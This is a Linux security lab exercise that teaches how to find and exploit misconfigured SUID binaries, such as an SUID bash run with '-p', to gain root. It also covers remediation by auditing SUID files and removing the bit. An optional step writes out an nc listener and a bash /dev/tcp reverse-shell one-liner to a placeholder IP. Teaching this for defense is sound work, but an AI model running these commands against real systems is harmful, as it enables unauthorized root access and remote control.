Exercise 2: Privilege Escalation Using SUID Files

Objective: Learn how to identify and exploit SUID (Set User ID) files in Linux to escalate privileges and understand best practices to secure them.

Scenario: You have limited access to a Linux system as a standard user. Your task is to explore the system for SUID files, identify a vulnerable binary, and exploit it to escalate your privileges. Afterward, you will analyze the root cause of the vulnerability and implement security measures to prevent exploitation.

Lab Setup

1. Environment: A Linux system with various SUID files, including at least one misconfigured or vulnerable binary for exploitation.
2. Tools Required:
   • Terminal access to the Linux system.
   • Networking tools for reverse shell creation (e.g., netcat, bash).

Lab Steps

Step 1: Identify SUID Files

Log in to the target system with your limited user account.

Search for all SUID files on the system using the following command:

find / -type f -perm -4000 2>/dev/null

This command lists all files with the SUID permission set (-4000).

Example output:

/usr/bin/passwd 
/usr/bin/vim.basic 
/usr/bin/nmap 
/bin/bash

Step 2: Analyze SUID Binaries

1. Research each SUID binary to determine if it is vulnerable or exploitable.
2. Common SUID binaries to investigate:
   • /usr/bin/passwd: Used for changing passwords but may be misconfigured.
   • /bin/bash: If present with SUID, it allows spawning a shell with root privileges.
   • /usr/bin/nmap: Certain versions allow executing commands via interactive mode.
3. Choose a vulnerable binary for exploitation. For example, if /bin/bash has the SUID bit set, proceed as follows.

Step 3: Exploit the SUID Binary

Use the vulnerable binary to escalate privileges. For /bin/bash, run:

/bin/bash -p

Verify your privileges:

whoami

Output should return root.

Step 4: Create a Reverse Shell (Optional)

Prepare a listener on your attack machine:

nc -lvnp 4444

Use the SUID binary to create a reverse shell:

/bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' 

Replace <your_ip> with your machine’s IP address.

Verify root access in the reverse shell.

Step 5: Secure SUID Files

Identify unnecessary or vulnerable SUID files:

find / -type f -perm -4000 2>/dev/null

Remove the SUID bit for non-essential files using chmod:

chmod u-s /path/to/file

Limit access to SUID files by restricting permissions and monitoring file changes.

Testing and Verification

Verify successful privilege escalation using:

whoami 

id

Document all identified SUID files, exploitation steps, and outcomes.

Test the security fixes by attempting to exploit the files again post-remediation.

Solution

Explanation:

• SUID files execute with the permissions of their owner (often root) regardless of the user running them. This can lead to privilege escalation if a SUID binary is vulnerable or misconfigured.
• By leveraging a misconfigured SUID binary, attackers can execute arbitrary commands with elevated privileges.

Prevention:

Regularly audit SUID files:

find / -type f -perm -4000 2>/dev/null

Remove the SUID bit from unnecessary binaries:

chmod u-s /path/to/file

Use file integrity monitoring tools to track changes to SUID files.

Apply the principle of least privilege to limit user access to critical files.

Reflection

This exercise demonstrates the risks posed by misconfigured SUID files and provides practical steps for identifying and exploiting them. By completing this lab, you’ve gained a deeper understanding of SUID-based privilege escalation and how to prevent such vulnerabilities in Linux systems.